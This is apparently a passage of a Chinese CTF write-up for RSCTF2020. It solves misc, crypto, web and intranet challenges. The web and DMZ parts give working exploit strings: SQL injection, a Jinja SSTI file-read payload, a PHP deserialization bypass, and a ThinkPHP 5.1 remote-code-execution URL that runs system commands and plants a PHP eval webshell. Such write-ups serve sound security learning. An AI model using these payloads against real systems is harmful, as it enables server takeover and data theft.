S=N(A.K(E)+A.K(E*2)+A.K(E*3)+A.K(E*4)+A.K(E*5));B T=F.1D(O.D/2);B M=F.1F(2,W)-1;B C=F.1H(F.1I()*1J)%1K;A+=C;1a(A.D>10){A=(N(A.1b(0,10))+N(A.1b(10,A.D))).G()}A=(S*A+T)%M;B H="";B I="";P(B i=0;i<Q.D;i++){H=N(Q.X(i)^F.Y((A/M)*Z));1P(H<16){I+="0"+H.G(16)}1Q I+=H.G(16);A=(S*A+T)%M}C=C.G(16);1a(C.D<8)C="0"+C;I+=C;1g(I)}',62,116,'||||||||||||||||||||||||||||||||||||prand|var|salt|length|sPos|Math|toString|enc_chr|enc_str|Array|charAt|new|modu|parseInt|pwd|for|str|index|mult|incr|hexToChar|65535|31|charCodeAt|floor|255|||||||||splice|encrypt|while|substring|hexatrigesimalToChar|65528|65532|65534|alert|63|127|511|1023|2047|4095|8191|16383|32767|21|push|37|join|011011001200|function|highBitMasks|32768|49152|57344|61440|63488|64512|ceil|65024|pow|65280|round|random|1000000000|100000000|65408|65472|65504|65520|if|else|lowBitMasks'.split('|'),0,{}))

eval加密,把eval删了,运行得到源码

var hexatrigesimalToChar=new Array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");var hexToChar=new Array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","{","}");var highBitMasks=new Array(0,32768,49152,57344,61440,63488,64512,65024,65280,65408,65472,65504,65520,65528,65532,65534,65535);var lowBitMasks=new Array(0,1,3,7,15,31,63,127,255,511,1023,2047,4095,8191,16383,32767,65535);var index=new Array(15,21,10,16,3,12,3,2,11,1,12,15,6,6,12,7,0,10,14,2,1,7,8,15,13,4,1,7,15,13,0,5,1,11,3,11);var f=[];for(i=0;i<index.length;i++){f.push(hexatrigesimalToChar[index[i]])}f.splice(4,0,hexToChar[16]);f.splice(37,0,hexToChar[17]);encrypt(f.join(''),011011001200);function encrypt(str,pwd){var prand="";for(var i=0;i<pwd.length;i++){prand+=pwd.charCodeAt(i).toString()}var sPos=Math.floor(prand.length/5);
var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos * 2) + prand.charAt(sPos * 3) + prand.charAt(sPos * 4) + prand.charAt(sPos * 5));
var incr = Math.ceil(pwd.length / 2);
var modu = Math.pow(2, 31) - 1;
var salt = Math.round(Math.random() * 1000000000) % 100000000;
prand += salt;
while (prand.length > 10) {
    prand = (parseInt(prand.substring(0, 10)) + parseInt(prand.substring(10, prand.length))).toString()
}
prand = (mult * prand + incr) % modu;
var enc_chr = "";
var enc_str = "";
for (var i = 0; i < str.length; i++) {
    enc_chr = parseInt(str.charCodeAt(i) ^ Math.floor((prand / modu) * 255));
    if (enc_chr < 16) {
        enc_str += "0" + enc_chr.toString(16)
    } else enc_str += enc_chr.toString(16);
    prand = (mult * prand + incr) % modu
}
salt = salt.toString(16);
while (salt.length < 8) salt = "0" + salt;
enc_str += salt;
alert(enc_str)
} 

可以看出,运行得到的flag被hex加密,解密即可

Flag


flag{3c32b1cf66c70ae2178fd417fd051b3b}

探测卫星

Solution


MMSTV接收音频信息,转成图片

探测卫星

Flag


flag{say_hello_from_space}

GIF的秘密

Solution


一个二维码,扫出 PASSis{0K_I_L0Ve_You_too} ,可能是之后要用的密码,题目肯定没这么简单

检测一下图片

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 260 x 260, 8-bit/color RGBA, non-interlaced
41            0x29            Zlib compressed data, compressed
4152358       0x3F5C26        End of Zip archive

分离出一个ZIP压缩包,被加密了,用前面扫出的密码打开,

得到一个损坏的gif图,用winhex检测一下文件完整性

gif格式的文件头是:47 49 46 38

手动把文件头补上:

然后把gif进行逐帧分离

# -*- coding:utf-8 -*-
from PIL import Image
import os
gifFileName = 'test.gif'
im = Image.open(gifFileName)
pngDir = gifFileName[:-4]
os.mkdir(pngDir)
try:
 while True:
  current = im.tell()
  im.save(pngDir+'/'+str(current)+'.png')
  im.seek(current+1)
except EOFError:
  pass

一千多帧,在最后看到了

Flag


flag{g1f_1s_v3ry_magic}

Crypto

凯撒的宝藏

Solution


nc连上端口

# root @ pearcepwn in ~/temp [10:05:40] 
$ nc 192.168.1.115 28566
Welcome to the CTF world!
This code was obtained by Caesar when he encountered the fence.
Please decipher it,Submit your results to verify that they are correct.
[+]cipher = hihh;8/f:66758n};6/26f5/5f::ch58f77/d99:9
Please input your answer:

凯撒爆破

然后栅栏解密

Exp


凯撒爆破:

# coding=utf-8
str1 = input("Input:")
arr = list(str1)
for j in range(0,49):
    for i in arr:
        print(chr(ord(i)-j), end="")
    print()
for j in range(0,128):
    for i in arr:
        print(chr(ord(i)+j), end="")
    print()

Flag


动态flag

学密码从RSA开始

Solution


$ nc 183.220.1.118 13097
[+]c = 0x10652cdfaa8367a45ced3c481a57a81a1e9e95e98e53bbb9098af448d8e1645d43963be074d916f40e0d53f52569bb94a66c0e6f0eb755f8340716e242865958c79a4356ddcff1c4f030421a3d893d58be1fd40e586bc62f4136ccacc81a50fbf35bbddbc3f3193a174fda6b99af38027aedeee690e9d6e949194be58f65L
[+]e = 0x3
[+]n = 0x7fceed3e467ead0b684a1a981347dd30b92f4761285591994a08aa07beaf1b663d690ffdad6043240defc54f01618d87eb698e519d1e358f2519c063df6cb458bced407bf893e3b44e7cdfd34448f5f355fa7c299f28dad6af31493a41f171052a93bde6098e878a29ddf92117de7dddff38ca1f0cbe4f3df8b557f4d074837bfe3ad3416ad90e7d4745da60a4aa8eea95039dc68bac0209fae5b3edd9d668ba480392074707e9582adc8630c2e548e0b8bc053ff15f44108f0432c0b9f704f19e1c261f3f8ced5a76a61b8b0d6b0b50ac5e8b3d5e1b9e80bbe064c66c92c79167b7fe80e41b0656148ee6f853f7514dda974485b1c3d550ed5ef56c48b6d4d8c85b170556103d2c8c22ddc12e4342f43ce50135c4b7bf7d48f829fafb24532c80d94f6bdff97eb7e9cd02787330fc1a50b730c68dc30d6c49f7b53858d41605L

e=3,n过大不能分解,不能用常规做法,所以我们采用小明文攻击

Exp


先把数转成十进制

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import gmpy2
import binascii
from Crypto.Util import *

n = gmpy2.mpz(216325650523795481281671236272037606099714685372297940777482247995284874499167357444401004742719440112657355303696059693053322211401580407326256931075891053567611994172000990330902578558964043013271655863902683507223240503209504664335116691253451038761613375103031529924354122115457759279692480223573982533028952510623005602104439511213261919019886695335538235995517609275817490605259808139187561336581732048007993244063887587556820229289482918793148251607112065163436407488328165633717295913539274051368482771049594634251710801894843643355177120752271661791387211011732881636127218353371247803740746694241436060973367766932015677262524786899898744289252440163973312693264120657059665251001080466332634698057325914243779354851804502672127933953609188128580261060705261061)
e = gmpy2.mpz(3)
c = gmpy2.mpz(175676150266632389064760712398978321387684326920722700352347329240205702752059122998815912983403547685991975883857974247962309625926300230284855614313945424661428659572013004755301649985913100442688432203933228437666189542703592415534690419592361026113369663758709403571517515958292660407074815679500133L)

i = 0
while 1:
    res = gmpy2.iroot(c + i * n, e)
    if res[1]:
        print '[\033[0;32m+\033[0m]res           = ' + str(res)
        m = gmpy2.mpz(int(res[0]))
        print '[\033[0;32m+\033[0m]ASCII         = ' + binascii.a2b_hex(hex(m)[2:]).decode("utf8")
        print '[\033[0;32m+\033[0m]long_to_bytes = ' + number.long_to_bytes(m).encode('hex')
        break
    print '[\033[0;31m-\033[0m] i = ' + str(i)
    i = i + 1

Flag


动态flag

WEB

他们说php很弱

Description


<?php
if ($_POST['submit']){
    $user = $_REQUEST['user'];
    $pwd = $_REQUEST['pwd'];
    if ($user == $pwd)
        die("illegal input");
    $pwd = md5($pwd);
    $user = md5($user);
    if ($user == $pwd){
        echo ("flag is here...");
        }
    else{"..."};
    else{"..."};
?>error_reporting(0);
if($username === 'admin' && $row['password'] === md5($password))
{
    die('flag{******************}');
}
else
{
    echo "Password error! </br>";
    echo "username: ";
    die($row['username']);
}

Solution


两个md5弱相等的post传参,md5值都为0e开头即可

一开始hackbar传参,传不上去,后来发现F12里把display:none删了,会有两个传参的框,输入就行

Exp


user=s878926199a&pwd=s1885207154a

Flag


动态flag

简单的sql注入

Description


error_reporting(0);
if($username === 'admin' && $row['password'] === md5($password))
{
    die('flag{******************}');
}
else
{
    echo "Password error! </br>";
    echo "username: ";
    die($row['username']);
}

Solution


御剑后台扫描出了index.php 是phpinfo.php(),搜索flag,并没有

试试sql注入

username=1'&password=1
username=1'#&password=1  

发现可以注入

这题过滤的东西有点多,最后试出来

username=11' union select password,2 from users#&password=1

Flag


动态flag

my sound

Solution


测试

{{5*5}}

返回25确定是SSTI模板注入

{{5*'5'}}

如果返回55555,是jinja模板注入,直接找flag

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

Flag


动态flag

trick

Description


 <?php

class get_flag{
    public $str_1;
    public $str_2;
    public function __destruct(){
        $this->str_1 = (string)$this->str_1;
        if($this->str_1 !== $this->str_2 && md5($this->str_1) === md5($this->str_2) && $this->str_1 !== $this->str_2)
            echo file_get_contents("/flag");
    }
}

unserialize($_GET["my_secret.key"]);

show_source(__FILE__);  

Solution


构造反序列化,用INF绕过md5强碰撞

<?php
class get_flag{
    public $str_1;
    public $str_2;
    public function __destruct(){
        $this->str_1 = (string)$this->str_1;
        if($this->str_1 !== $this->str_2 && md5($this->str_1) === md5($this->str_2) && $this->str_1 !== $this->str_2)
            echo "success"; 
 }
}
    $A= new get_flag();
    $A->str_1 = INF;
    $A->str_2 = INF;
    $b = serialize($A);
    echo $b;
?>

发现可以成功绕过

O:8:"get_flag":2:{s:5:"str_1";d:INF;s:5:"str_2";d:INF;}

构造payload

?my_secret.key=O:8:"get_flag":2:{s:5:"str_1";d:INF;s:5:"str_2";d:INF;}

没响应,等号右边的序列化构造应该没有问题,那么问题就出在my_secret.key上面

这里考了一个知识点,php变量中空格和点会被转换为下划线

但是变量名中出现[,则只有[会被替换

Exp


?my[secret.key=O:8:"get_flag":2:{s:5:"str_1";d:INF;s:5:"str_2";d:INF;}

Flag


动态flag

hash

Description


 <?php 
error_reporting(0); 
include("flag.php"); 
$key = '92d2616694c9c29e0295298184e110607b3bbfe10fb572d8f5c4d6e78fb30dee83da69bf85a8e7fa444241b9b880b1c9'; 
$req = parse_url($_SERVER['REQUEST_URI']); 
if(isset($req["query"])){ 
    $query = $req["query"]; 
    $req_query = parse_str($query); 
    if($req_query!=NULL){ 
        $act = $req_query['act']; 
    } 

    if($act==="user"){ 
        $point = $_GET["point"]; 
        $input = hash('sha384', $point); 
        if($input!==$key){ 
            die("NO!"); 
        } 

        echo $flag; 
    } 
}else{ 
    show_source(__FILE__); 
}?> 

Solution


大概意思就是get方式传俩参数,act===user,point的sha384加密后等于92d2616694c9c29e0295298184e110607b3bbfe10fb572d8f5c4d6e78fb30dee83da69bf85a8e7fa444241b9b880b1c9

找个在线网站sha384解密,得到字符串flag

Exp


?act=user&point=flag

Flag


动态flag

ending

找博客的漏洞,8-)会

Intranet

内网渗透,需要连vpn,闯关形式,得到flag才能写后面的题目

DMZ

Solution:


攻防世界WEB高手进阶区 php_rce 原题,师傅们手速网速太快了

原理: ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

网页使用的是ThinkPHP框架,版本为5.1 ,百度一下发现此版本存在getshell漏洞

直接查找flag

http://192.168.2.109/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

并没有,那就get方式传一个一句话木马上去,蚁剑直接连

192.168.2.109/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["shell"]);?>

根目录找到flag

Flag


flag{ac578aa2-87d8-4d3a-b9ed-b64d082123c3}

签到题

车票拿好

Description:

欢迎来到RSCTF2020 关注公众号 七色堇安全 NEEPUSec 网络安全团队 分别回复RSCTF获得完整车票 还等什么?快上车!


Solution:

关注即可,发送 RSCTF


Flag:

动态flag
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇